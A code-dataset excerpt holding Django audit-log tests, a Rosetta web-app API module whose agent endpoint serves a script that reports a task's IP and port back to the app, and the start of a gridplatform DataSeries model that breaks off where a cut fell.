related_logs, profile, \"UPDATE\", target_profile_part=profile_part_name\n )\n\n assert_common_fields(audit_logs, profile, \"UPDATE\")\n\n\ndef test_audit_log_delete(profile_with_related, cap_audit_log):\n profile = profile_with_related.profile\n\n deleted_pk = profile.pk\n profile.delete()\n profile.pk = deleted_pk\n audit_logs = cap_audit_log.get_logs()\n # Audit logging the Profile DELETE with a related 
object causes some READs\n # for the involved models.\n # This is unnecessary, but it's a feature of the current implementation.\n # We ignore the READ events in this test for now.\n audit_logs = list(\n filter(lambda e: e[\"audit_event\"][\"operation\"] != \"READ\", audit_logs)\n )\n\n for profile_part_name in profile_with_related.all_profile_part_names:\n related_logs, audit_logs = partition_logs_by_target_type(\n audit_logs, profile_part_name\n )\n\n assert_common_fields(\n related_logs, profile, \"DELETE\", target_profile_part=profile_part_name\n )\n\n assert_common_fields(audit_logs, profile, \"DELETE\")\n\n\ndef test_audit_log_create(cap_audit_log):\n profile = ProfileFactory()\n audit_logs = cap_audit_log.get_logs()\n assert (\n len(audit_logs) == 2\n ) # profile is accessed here as well, thus the 2 log entries\n log_message = audit_logs[1]\n assert_common_fields(log_message, profile, \"CREATE\")\n\n\nMY_PROFILE_QUERY = \"\"\"\n query {\n myProfile {\n id\n }\n }\n\"\"\"\n\n\ndef test_actor_is_resolved_in_graphql_call(\n live_server, profile, service_client_id, cap_audit_log\n):\n service = service_client_id.service\n ServiceConnectionFactory(profile=profile, service=service)\n user = profile.user\n do_graphql_call_as_user(live_server, user, service=service, query=MY_PROFILE_QUERY)\n audit_logs = cap_audit_log.get_logs()\n assert len(audit_logs) == 1\n log_message = audit_logs[0]\n assert_common_fields(log_message, profile, \"READ\", actor_role=\"OWNER\")\n assert log_message[\"audit_event\"][\"actor\"][\"user_id\"] == str(user.uuid)\n\n\ndef test_service_is_resolved_in_graphql_call(\n live_server, profile, service_client_id, cap_audit_log\n):\n user = profile.user\n service = service_client_id.service\n ServiceConnectionFactory(profile=profile, service=service)\n do_graphql_call_as_user(live_server, user, service=service, query=MY_PROFILE_QUERY)\n audit_logs = cap_audit_log.get_logs()\n assert len(audit_logs) == 1\n log_message = audit_logs[0]\n assert_common_fields(log_message, profile, \"READ\", actor_role=\"OWNER\")\n actor_log = log_message[\"audit_event\"][\"actor\"]\n assert \"service_name\" in actor_log\n assert actor_log[\"service_name\"] == service.name\n assert \"client_id\" in actor_log\n assert actor_log[\"client_id\"] == service_client_id.client_id\n\n\ndef test_actor_service(live_server, user, group, service_client_id, cap_audit_log):\n profile = ProfileFactory()\n service = service_client_id.service\n ServiceConnectionFactory(profile=profile, service=service)\n user.groups.add(group)\n assign_perm(\"can_view_profiles\", group, service)\n\n # serviceType is included in query just to ensure that it has no effect on the audit log\n query = \"\"\"\n {\n profiles(serviceType: GODCHILDREN_OF_CULTURE) {\n edges {\n node {\n firstName\n }\n }\n }\n }\n \"\"\"\n\n cap_audit_log.clear()\n\n do_graphql_call_as_user(live_server, user, service=service, query=query)\n\n audit_logs = cap_audit_log.get_logs()\n assert len(audit_logs) == 1\n log_message = audit_logs[0]\n assert_common_fields(log_message, profile, \"READ\", actor_role=\"ADMIN\")\n actor_log = log_message[\"audit_event\"][\"actor\"]\n assert actor_log[\"service_name\"] == service.name\n assert \"client_id\" in actor_log\n assert actor_log[\"client_id\"] == service_client_id.client_id\n\n\nclass TestIPAddressLogging:\n @staticmethod\n def execute_ip_address_test(\n live_server, profile, expected_ip, cap_audit_log, request_args=None\n ):\n if request_args is None:\n request_args = {}\n\n user = profile.user\n\n 
do_graphql_call_as_user(\n live_server, user, query=MY_PROFILE_QUERY, extra_request_args=request_args\n )\n audit_logs = cap_audit_log.get_logs()\n assert len(audit_logs) == 1\n log_message = audit_logs[0]\n assert log_message[\"audit_event\"][\"actor\"][\"ip_address\"] == expected_ip\n\n @pytest.mark.parametrize(\n \"header\", [\"12.23.34.45\", \"12.23.34.45,1.1.1.1\", \"12.23.34.45, 1.1.1.1\"]\n )\n def test_requester_ip_address_is_extracted_from_x_forwarded_for_header(\n self, header, live_server, profile, cap_audit_log\n ):\n request_args = {\"headers\": {\"X-Forwarded-For\": header}}\n self.execute_ip_address_test(\n live_server, profile, \"12.23.34.45\", cap_audit_log, request_args\n )\n\n def test_do_not_use_x_forwarded_for_header_if_it_is_denied_in_settings(\n self, live_server, settings, profile, cap_audit_log\n ):\n settings.USE_X_FORWARDED_FOR = False\n request_args = {\"headers\": {\"X-Forwarded-For\": \"should ignore\"}}\n\n self.execute_ip_address_test(\n live_server, profile, \"127.0.0.1\", cap_audit_log, request_args\n )\n\n def test_requester_ip_address_is_extracted_from_remote_addr_meta(\n self, live_server, profile, cap_audit_log\n ):\n self.execute_ip_address_test(live_server, profile, \"127.0.0.1\", cap_audit_log)\n", "sub_path": "profiles/tests/test_audit_log.py", "file_name": "test_audit_log.py", "file_ext": "py", "file_size_in_byte": 12292, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.conf.settings.AUDIT_LOGGING_ENABLED", "line_number": 30, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 30, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 28, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 37, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 39, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 33, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 65, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 65, "usage_type": "name"}, {"api_name": "datetime.timezone.utc", "line_number": 65, "usage_type": "attribute"}, {"api_name": "datetime.timezone", "line_number": 65, "usage_type": "name"}, {"api_name": "open_city_profile.tests.asserts.assert_almost_equal", "line_number": 82, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 84, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 84, "usage_type": "name"}, {"api_name": "datetime.timezone.utc", "line_number": 86, "usage_type": "attribute"}, {"api_name": "datetime.timezone", "line_number": 86, "usage_type": "name"}, {"api_name": "open_city_profile.tests.asserts.assert_almost_equal", "line_number": 87, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 87, "usage_type": "call"}, {"api_name": "profiles.models.Profile", "line_number": 99, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 100, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 100, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 101, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 102, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 103, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 97, "usage_type": "name"}, {"api_name": "profiles.models.VerifiedPersonalInformationPermanentAddress", "line_number": 118, "usage_type": 
"name"}, {"api_name": "profiles.models.VerifiedPersonalInformationTemporaryAddress", "line_number": 119, "usage_type": "name"}, {"api_name": "profiles.models.VerifiedPersonalInformationPermanentForeignAddress", "line_number": 120, "usage_type": "name"}, {"api_name": "factories.VerifiedPersonalInformationFactory", "line_number": 125, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 130, "usage_type": "call"}, {"api_name": "factories.ProfileFactory", "line_number": 132, "usage_type": "name"}, {"api_name": "factories.SensitiveDataFactory", "line_number": 133, "usage_type": "name"}, {"api_name": "profiles.models.VerifiedPersonalInformationPermanentAddress", "line_number": 141, "usage_type": "argument"}, {"api_name": "profiles.models.VerifiedPersonalInformationTemporaryAddress", "line_number": 147, "usage_type": "argument"}, {"api_name": "profiles.models.VerifiedPersonalInformationPermanentForeignAddress", "line_number": 154, "usage_type": "argument"}, {"api_name": "profiles.models.Profile.objects.select_related", "line_number": 191, "usage_type": "call"}, {"api_name": "profiles.models.Profile.objects", "line_number": 191, "usage_type": "attribute"}, {"api_name": "profiles.models.Profile", "line_number": 191, "usage_type": "name"}, {"api_name": "factories.ProfileFactory", "line_number": 261, "usage_type": "call"}, {"api_name": "services.tests.factories.ServiceConnectionFactory", "line_number": 283, "usage_type": "call"}, {"api_name": "open_city_profile.tests.graphql_test_helpers.do_graphql_call_as_user", "line_number": 285, "usage_type": "call"}, {"api_name": "services.tests.factories.ServiceConnectionFactory", "line_number": 298, "usage_type": "call"}, {"api_name": "open_city_profile.tests.graphql_test_helpers.do_graphql_call_as_user", "line_number": 299, "usage_type": "call"}, {"api_name": "factories.ProfileFactory", "line_number": 312, "usage_type": "call"}, {"api_name": "services.tests.factories.ServiceConnectionFactory", "line_number": 314, "usage_type": "call"}, {"api_name": "guardian.shortcuts.assign_perm", "line_number": 316, "usage_type": "call"}, {"api_name": "open_city_profile.tests.graphql_test_helpers.do_graphql_call_as_user", "line_number": 333, "usage_type": "call"}, {"api_name": "open_city_profile.tests.graphql_test_helpers.do_graphql_call_as_user", "line_number": 355, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 363, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 363, "usage_type": "attribute"}, {"api_name": "django.conf.settings.USE_X_FORWARDED_FOR", "line_number": 377, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 377, "usage_type": "name"}]} +{"seq_id": "603818824", "text": "import logging\nfrom django.http import HttpResponse\nfrom django.utils import timezone\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.models import User, Group\nfrom django.conf import settings\nfrom rest_framework.response import Response\nfrom rest_framework import status, serializers, viewsets\nfrom rest_framework.views import APIView\nfrom .utils import format_exception, send_email\nfrom .models import Profile, Task, TaskStatuses\n \n# Setup logging\nlogger = logging.getLogger(__name__)\n\n\n#==============================\n# Common returns\n#==============================\n \n# Ok (with data)\ndef ok200(data=None):\n return Response({\"results\": data}, status=status.HTTP_200_OK)\n \n# Error 400\ndef error400(data=None):\n return Response({\"detail\": 
data}, status=status.HTTP_400_BAD_REQUEST)\n \n# Error 401\ndef error401(data=None):\n return Response({\"detail\": data}, status=status.HTTP_401_UNAUTHORIZED)\n \n# Error 404\ndef error404(data=None):\n return Response({\"detail\": data}, status=status.HTTP_404_NOT_FOUND)\n \n# Error 500\ndef error500(data=None):\n return Response({\"detail\": data}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n\n\n \n#==============================\n# Authentication helper\n#==============================\n \ndef rosetta_authenticate(request):\n\n # Get data\n user = request.user if request.user.is_authenticated else None\n username = request.data.get('username', None)\n password = request.data.get('password', None)\n authtoken = request.data.get('authtoken', None)\n\n # Try standard user authentication\n if user:\n return user\n\n # Try username/password authentication\n elif username or password:\n \n # Check we got both\n if not username:\n return error400('Got empty username')\n if not password:\n return error400('Got empty password')\n \n # Authenticate\n user = authenticate(username=username, password=password)\n if not user:\n return error401('Wrong username/password') \n else:\n login(request, user)\n return user\n\n # Try auth token authentication \n elif authtoken:\n try:\n profile = Profile.objects.get(authtoken=authtoken)\n except Profile.DoesNotExist:\n return error400('Wrong auth token')\n login(request, profile.user)\n return profile.user\n else:\n return error401('This is a private API. Login or provide username/password or auth token')\n\n\n\n#==============================\n# Base public API class\n#==============================\n \nclass PublicPOSTAPI(APIView):\n '''Base public POST API class'''\n \n # POST\n def post(self, request):\n try:\n return self._post(request)\n except Exception as e:\n logger.error(format_exception(e))\n return error500('Got error in processing request: {}'.format(e))\n \nclass PublicGETAPI(APIView):\n '''Base public GET API class''' \n # GET\n def get(self, request):\n try:\n return self._get(request)\n except Exception as e:\n logger.error(format_exception(e))\n return error500('Got error in processing request: {}'.format(e))\n\n\n\n#==============================\n# Base private API class\n#==============================\n \nclass PrivatePOSTAPI(APIView):\n '''Base private POST API class'''\n \n # POST\n def post(self, request):\n try:\n # Authenticate using rosetta authentication\n response = rosetta_authenticate(request)\n \n # If we got a response return it, otherwise set it as the user.\n if isinstance(response, Response):\n return response\n else:\n self.user = response\n \n # Call API logic\n return self._post(request)\n except Exception as e:\n logger.error(format_exception(e))\n return error500('Got error in processing request: {}'.format(e))\n \nclass PrivateGETAPI(APIView):\n '''Base private GET API class'''\n\n # GET \n def get(self, request):\n try:\n # Authenticate using rosetta authentication\n response = rosetta_authenticate(request)\n \n # If we got a response return it, otherwise set it as the user.\n if isinstance(response, Response):\n return response\n else:\n self.user = response\n \n # Call API logic\n return self._get(request)\n except Exception as e:\n logger.error(format_exception(e))\n return error500('Got error in processing request: {}'.format(e))\n\n\n\n#==============================\n# User & profile APIs\n#==============================\n\nclass login_api(PrivateGETAPI, PrivatePOSTAPI):\n \"\"\"\n get:\n Returns the auth 
token.\n\n post:\n Authorize and returns the auth token.\n \"\"\"\n \n def _post(self, request):\n return ok200({'authtoken': self.user.profile.authtoken})\n\n def _get(self, request):\n return ok200({'authtoken': self.user.profile.authtoken}) \n \n \nclass logout_api(PrivateGETAPI):\n \"\"\"\n get:\n Logout the user\n \"\"\"\n \n def _get(self, request):\n logout(request)\n return ok200()\n\n\nclass UserViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows Users to be viewed or edited.\n \"\"\"\n\n class UserSerializer(serializers.HyperlinkedModelSerializer):\n class Meta:\n model = User\n fields = ('url', 'username', 'email', 'groups')\n\n queryset = User.objects.all().order_by('-date_joined') \n serializer_class = UserSerializer\n\n\nclass agent_api(PublicGETAPI):\n \n def _get(self, request):\n \n task_uuid = request.GET.get('task_uuid', None)\n if not task_uuid:\n return HttpResponse('MISSING task_uuid')\n\n from django.core.exceptions import ValidationError\n\n try:\n task = Task.objects.get(uuid=task_uuid)\n except (Task.DoesNotExist, ValidationError):\n return HttpResponse('Unknown task uuid \"{}\"'.format(task_uuid))\n\n\n from .utils import get_webapp_conn_string\n webapp_conn_string = get_webapp_conn_string()\n \n action = request.GET.get('action', None)\n \n if not action:\n # Return the agent code\n agent_code='''\nimport logging\nimport socket\nimport sys\ntry:\n from urllib.request import urlopen\nexcept ImportError:\n from urllib import urlopen\n\n# Setup logging\nlogger = logging.getLogger('Agent')\nlogging.basicConfig(level=logging.INFO)\n\nhostname = socket.gethostname()\n\n# Task id set by the API\ntask_uuid = \"'''+ task_uuid +'''\"\n\n# Log\nlogger.info('Reporting for task uuid: \"{}\"'.format(task_uuid))\n\n# Get IP\nip = socket.gethostbyname(hostname)\nlogger.info(' - ip: \"{}\"'.format(ip))\n\n# Get port\nfrom random import randint\nwhile True:\n\n # Get a random ephemeral port\n port = randint(49152, 65535-2)\n\n # Check that the port triplet is available, using a fresh socket per probe\n sock1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock3 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n result1 = sock1.connect_ex(('127.0.0.1', port))\n result2 = sock2.connect_ex(('127.0.0.1', port+1))\n result3 = sock3.connect_ex(('127.0.0.1', port+2))\n if (result1 == 0) or (result2 == 0) or (result3 == 0):\n logger.info('Found no available ephemeral port triplet ({},{},{}), choosing another one...'.format(port,port+1,port+2))\n import time\n time.sleep(1)\n else:\n break\nlogger.info(' - ports: \"{},{},{}\"'.format(port, port+1, port+2))\n\nresponse = urlopen(\"'''+webapp_conn_string+'''/api/v1/base/agent/?task_uuid={}&action=set_ip_port&ip={}&port={}\".format(task_uuid, ip, port))\nresponse_content = response.read().decode()\nif response_content != 'OK':\n logger.error(response_content)\n logger.info('Not everything OK, exiting with status code 1')\n sys.exit(1)\nelse:\n logger.info('Everything OK')\nprint(port)\n'''\n \n return HttpResponse(agent_code)\n\n\n elif action=='set_ip_port':\n \n task_ip = request.GET.get('ip', None)\n if not task_ip:\n return HttpResponse('IP not valid (got \"{}\")'.format(task_ip))\n \n task_port = request.GET.get('port', None)\n if not task_port:\n return HttpResponse('Port not valid (got \"{}\")'.format(task_port))\n \n try:\n int(task_port)\n except (TypeError, ValueError):\n return HttpResponse('Port not valid (got \"{}\")'.format(task_port))\n \n # Set fields\n logger.info('Setting task \"{}\" to ip \"{}\" and port \"{}\"'.format(task.uuid, task_ip, task_port))\n task.status = TaskStatuses.running\n task.ip = task_ip\n if 
task.container.supports_dynamic_ports:\n task.port = int(task_port)\n task.save()\n \n # Notify the user that the task called back home\n logger.info('Sending task ready mail notification to \"{}\"'.format(task.user.email))\n mail_subject = 'Your Task \"{}\" is up and running'.format(task.container.name)\n mail_text = 'Hello,\\n\\nyour Task \"{}\" on {} is up and running: {}/tasks/?uuid={}\\n\\nThe Rosetta notifications bot.'.format(task.container.name, task.computing, settings.DJANGO_PUBLIC_HTTP_HOST, task.uuid)\n try:\n send_email(to=task.user.email, subject=mail_subject, text=mail_text)\n except Exception as e:\n logger.error('Cannot send task ready email: \"{}\"'.format(e))\n return HttpResponse('OK')\n \n\n else:\n return HttpResponse('Unknown action \"{}\"'.format(action))\n\n\n\n", "sub_path": "services/webapp/code/rosetta/core_app/api.py", "file_name": "api.py", "file_ext": "py", "file_size_in_byte": 9800, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "logging.getLogger", "line_number": 14, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 23, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 23, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 23, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 27, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 27, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 27, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 31, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_401_UNAUTHORIZED", "line_number": 31, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 31, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 35, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_404_NOT_FOUND", "line_number": 35, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 35, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 39, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_500_INTERNAL_SERVER_ERROR", "line_number": 39, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 39, "usage_type": "name"}, {"api_name": "django.contrib.auth.authenticate", "line_number": 69, "usage_type": "call"}, {"api_name": "django.contrib.auth.login", "line_number": 73, "usage_type": "call"}, {"api_name": "models.Profile.objects.get", "line_number": 79, "usage_type": "call"}, {"api_name": "models.Profile.objects", "line_number": 79, "usage_type": "attribute"}, {"api_name": "models.Profile", "line_number": 79, "usage_type": "name"}, {"api_name": "models.Profile.DoesNotExist", "line_number": 80, "usage_type": "attribute"}, {"api_name": "models.Profile", "line_number": 80, "usage_type": "name"}, {"api_name": "django.contrib.auth.login", "line_number": 82, "usage_type": "call"}, {"api_name": "rest_framework.views.APIView", "line_number": 93, "usage_type": "name"}, {"api_name": "utils.format_exception", "line_number": 101, "usage_type": "call"}, {"api_name": "rest_framework.views.APIView", "line_number": 104, "usage_type": "name"}, {"api_name": "utils.format_exception", "line_number": 111, "usage_type": "call"}, {"api_name": "rest_framework.views.APIView", 
"line_number": 120, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 130, "usage_type": "argument"}, {"api_name": "utils.format_exception", "line_number": 138, "usage_type": "call"}, {"api_name": "rest_framework.views.APIView", "line_number": 141, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 151, "usage_type": "argument"}, {"api_name": "utils.format_exception", "line_number": 159, "usage_type": "call"}, {"api_name": "django.contrib.auth.logout", "line_number": 191, "usage_type": "call"}, {"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 195, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 195, "usage_type": "name"}, {"api_name": "rest_framework.serializers.HyperlinkedModelSerializer", "line_number": 200, "usage_type": "attribute"}, {"api_name": "rest_framework.serializers", "line_number": 200, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User", "line_number": 202, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.all", "line_number": 205, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 205, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 205, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 215, "usage_type": "call"}, {"api_name": "models.Task.objects.get", "line_number": 220, "usage_type": "call"}, {"api_name": "models.Task.objects", "line_number": 220, "usage_type": "attribute"}, {"api_name": "models.Task", "line_number": 220, "usage_type": "name"}, {"api_name": "models.Task.DoesNotExist", "line_number": 221, "usage_type": "attribute"}, {"api_name": "models.Task", "line_number": 221, "usage_type": "name"}, {"api_name": "django.core.exceptions.ValidationError", "line_number": 221, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 222, "usage_type": "call"}, {"api_name": "utils.get_webapp_conn_string", "line_number": 226, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 287, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 294, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 298, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 303, "usage_type": "call"}, {"api_name": "models.TaskStatuses.running", "line_number": 307, "usage_type": "attribute"}, {"api_name": "models.TaskStatuses", "line_number": 307, "usage_type": "name"}, {"api_name": "django.conf.settings.DJANGO_PUBLIC_HTTP_HOST", "line_number": 316, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 316, "usage_type": "name"}, {"api_name": "utils.send_email", "line_number": 318, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 321, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 325, "usage_type": "call"}]} +{"seq_id": "1244209", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import\nfrom __future__ import unicode_literals\n\"\"\"\nData Series\n==========\n\n This module defines L{DataSeries} as the base model for all data series.\n\n Interdependencies\n -----------------\n\n L{DataSeries} may be defined in terms of other L{DataSeries}, thus\n creating a dependency releation, forming a directed, acyclic dependency\n graph among L{DataSeries}. 
Various operations require traversing this\n dependency graph following the dependencies in one direction or the\n other.\n\n To avoid infinite recursion, circular dependencies are not\n allowed, i.e. no L{DataSeries} that this particular L{DataSeries}\n depends on is allowed to depend on this particular L{DataSeries}. See\n the L{DataSeries.depends_on()} method.\n\"\"\"\n\nfrom fractions import Fraction\nimport itertools\nfrom operator import attrgetter\n\nfrom django.db import models\nfrom django.db.models.query_utils import Q\nfrom django.db.models.query import DateQuerySet\nfrom django.db.models.query import DateTimeQuerySet\nfrom django.db.models.query import ValuesListQuerySet\nfrom django.db.models.query import ValuesQuerySet\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom gridplatform.customers.models import Customer\nfrom gridplatform.encryption.managers import DecryptingManager\nfrom gridplatform.encryption.managers import DecryptingQuerySet\nfrom gridplatform.trackuser import get_customer\nfrom gridplatform.trackuser import get_provider_id\nfrom gridplatform.trackuser import get_user\nfrom gridplatform.trackuser.managers import FilteringQuerySetMixinBase\nfrom gridplatform.utils import condense\nfrom gridplatform.utils import utilitytypes\nfrom gridplatform.utils.fields import BuckinghamField\nfrom gridplatform.utils.iter_ext import count_extended\nfrom gridplatform.utils.iter_ext import pairwise\nfrom gridplatform.utils.iter_ext import pairwise_extended\nfrom gridplatform.utils.models import StoreSubclass\nfrom gridplatform.utils.models import StoredSubclassManager\nfrom gridplatform.utils.samples import Sample\nfrom gridplatform.utils.unitconversion import PhysicalQuantity\nfrom legacy.legacy_utils.preferredunits import get_preferred_unit_converter\n\nfrom ..fields import DataRoleField\nfrom .graph import Graph\n\n\nclass UndefinedSamples(Exception):\n \"\"\"\n Exception raised when samples are supposed to be undefined, even inside the\n domain of a L{DataSeries}.\n\n Some DataSeries are interval aggregates of other DataSeries. These may not\n be well-defined if the requested period is odd-ended or too short: For\n instance if the aggregate is something pr. 
day and the requested period\n starts and/or ends at something different than a midnight or only spans a\n few hours.\n\n @seealso: L{HeatingDegreeDays} and L{MeanTemperatureChange}.\n \"\"\"\n pass\n\n\nclass DataSeriesQuerySetMixin(FilteringQuerySetMixinBase):\n \"\"\"\n QuerySet limiting result set according to whether the current user is\n allowed to see the customer with specified ID.\n \"\"\"\n\n def _apply_filtering(self):\n user = get_user()\n if user is None:\n return\n if not user.is_authenticated():\n self.query.set_empty()\n return\n customer = get_customer()\n ACCEPTABLE_CUSTOMER_IS_NULL_INDEX_ROLES = [\n DataRoleField.ELECTRICITY_TARIFF,\n DataRoleField.CO2_QUOTIENT,\n ]\n if customer is not None:\n if not customer.is_active:\n self.query.set_empty()\n return\n id_field = '{}_id'.format(self._filter_field)\n kwargs = {id_field: customer.id}\n self.query.add_q(Q(**kwargs) | Q(**{\n '{}__isnull'.format(id_field): True,\n 'role__in': ACCEPTABLE_CUSTOMER_IS_NULL_INDEX_ROLES,\n }))\n return\n provider_id = get_provider_id()\n if provider_id:\n provider_id_field = '{}__provider_id'.format(self._filter_field)\n kwargs = {provider_id_field: provider_id}\n self.query.add_q(Q(**kwargs) | Q(**{\n '{}__isnull'.format(provider_id_field): True,\n 'role__in': ACCEPTABLE_CUSTOMER_IS_NULL_INDEX_ROLES,\n }))\n return\n assert user.is_staff, \\\n 'non-staff user {} without customer or provider; ' + \\\n 'should not exist'.format(user.id)\n return\n\n\nclass DataSeriesManager(DecryptingManager, StoredSubclassManager):\n _field = 'customer'\n use_for_related_fields = True\n\n class _QuerySet(DataSeriesQuerySetMixin, DecryptingQuerySet):\n pass\n\n class _ValuesQuerySet(DataSeriesQuerySetMixin, ValuesQuerySet):\n pass\n\n class _ValuesListQuerySet(DataSeriesQuerySetMixin, ValuesListQuerySet):\n pass\n\n class _DateQuerySet(DataSeriesQuerySetMixin, DateQuerySet):\n pass\n\n class _DateTimeQuerySet(DataSeriesQuerySetMixin, DateTimeQuerySet):\n pass\n\n def get_queryset(self):\n qs = super(DataSeriesManager, self).get_queryset()\n kwargs = {\n 'klass': self._QuerySet,\n '_filter_field': self._field,\n '_ValuesQuerySet': self._ValuesQuerySet,\n '_ValuesListQuerySet': self._ValuesListQuerySet,\n '_DateQuerySet': self._DateQuerySet,\n '_DateTimeQuerySet': self._DateTimeQuerySet,\n }\n return qs._clone(**kwargs)\n\n\nclass DataSeriesBase(models.Model):\n objects = DataSeriesManager()\n\n class Meta:\n abstract = True\n\n\nclass DataSeries(DataSeriesBase, StoreSubclass):\n \"\"\"\n A C{DataSeries} samples an underlying function. Knowing this\n underlying function is important when interpreting and visualizing\n these data.\n\n For instance, if the C{DataSeries} samples an accumulation, you\n will usually want to compare the destilled development of the\n sample values inside a number of similar periods. If the data\n series, on the other hand, samples a rate, it is easy to visualize\n even large sets of undestiled sequential data; for instance with\n upper and lower bounds graphs.\n\n Also, there exist many techniques for interpolating U{continuous\n functions},\n such as U{linear\n interpolation}.\n For discontinuous functions, however, these techniques do not\n apply. Specifically, we will often meet the piecewise constant\n function, where each sample represent the constant value since the\n previous sample (discrete states, mean values and so on).\n\n @cvar PIECEWISE_CONSTANT_ACCUMULATION: Piecewise constant\n accumulation. 
For example accumulated unit production count.\n\n @cvar PIECEWISE_CONSTANT_RATE: Piecewise constant rate. For\n example mean power.\n\n @cvar CONTINUOUS_ACCUMULATION: Continuous accumulation. For\n example accumulated energy consumption.\n\n @cvar CONTINUOUS_RATE: Continuous rate. For example power,\n temperature, frequency or current.\n\n @cvar INTERVAL_FUNCTION: Interval function, i.e. a function that is\n computed across time intervals and not for any particular point in time;\n i.e. a function that is only well-defined when condensed.\n\n @ivar role: The role of this C{DataSeries} object.\n\n @ivar graph: The graph that this C{DataSeries} belongs to. This\n may be NULL for C{DataSeries} such as L{Index} (it may still be\n rendered to a graph, but its main purpose is not to be drawn on\n any graph in particular).\n\n @ivar customer: The customer that the C{DataSeries} belongs to; if null, it\n is a global C{DataSeries} (e.g. a spot tariff or similar).\n\n @ivar utility_type: The type of resource that this C{DataSeries} is\n related to. For non-L{Index} C{DataSeries}, C{utility_type} is generically\n available through C{graph__collection__resource__type}. I.e. moving the\n field to the L{Index} class would make it impossible to query for all\n DataSeries with a given resource type (and once you figure out how to do\n that anyway, feel free to move the C{utility_type} field to the L{Index}\n class).\n\n You can collect data for similar aspects of different resources, for\n instance energy consumption on both ELECTRICITY and DISTRICT_HEATING, cost\n on everything and temperature in a DISTRICT_HEATING installation, but also\n just room temperature, which is not related to any resource type in\n particular, i.e. UNKNOWN.\n \"\"\"\n customer = models.ForeignKey(Customer, on_delete=models.PROTECT,\n blank=True, null=True, default=get_customer)\n role = DataRoleField()\n\n graph = models.ForeignKey(Graph, on_delete=models.CASCADE,\n null=True, blank=True)\n\n unit = BuckinghamField(blank=True)\n\n utility_type = models.IntegerField(\n _('utility type'), choices=utilitytypes.OPTIONAL_METER_CHOICES)\n\n PIECEWISE_CONSTANT_ACCUMULATION = 0\n PIECEWISE_CONSTANT_RATE = 1\n CONTINUOUS_ACCUMULATION = 2\n CONTINUOUS_RATE = 3\n INTERVAL_FUNCTION = 4\n\n UNDERLYING_FUNCTION_CHOICES = (\n (PIECEWISE_CONSTANT_ACCUMULATION,\n _(u\"Piecewise constant accumulation\")),\n (PIECEWISE_CONSTANT_RATE,\n _(u\"Piecewise constant rate\")),\n (CONTINUOUS_ACCUMULATION,\n _(u\"Continuous accumulation\")),\n (CONTINUOUS_RATE,\n _(u\"Continuous rate\")),\n (INTERVAL_FUNCTION,\n _(u'Interval function')),\n )\n\n class Meta(StoreSubclass.Meta):\n verbose_name = _('dataseries')\n verbose_name_plural = _('dataseries')\n ordering = ['role', 'id']\n app_label = 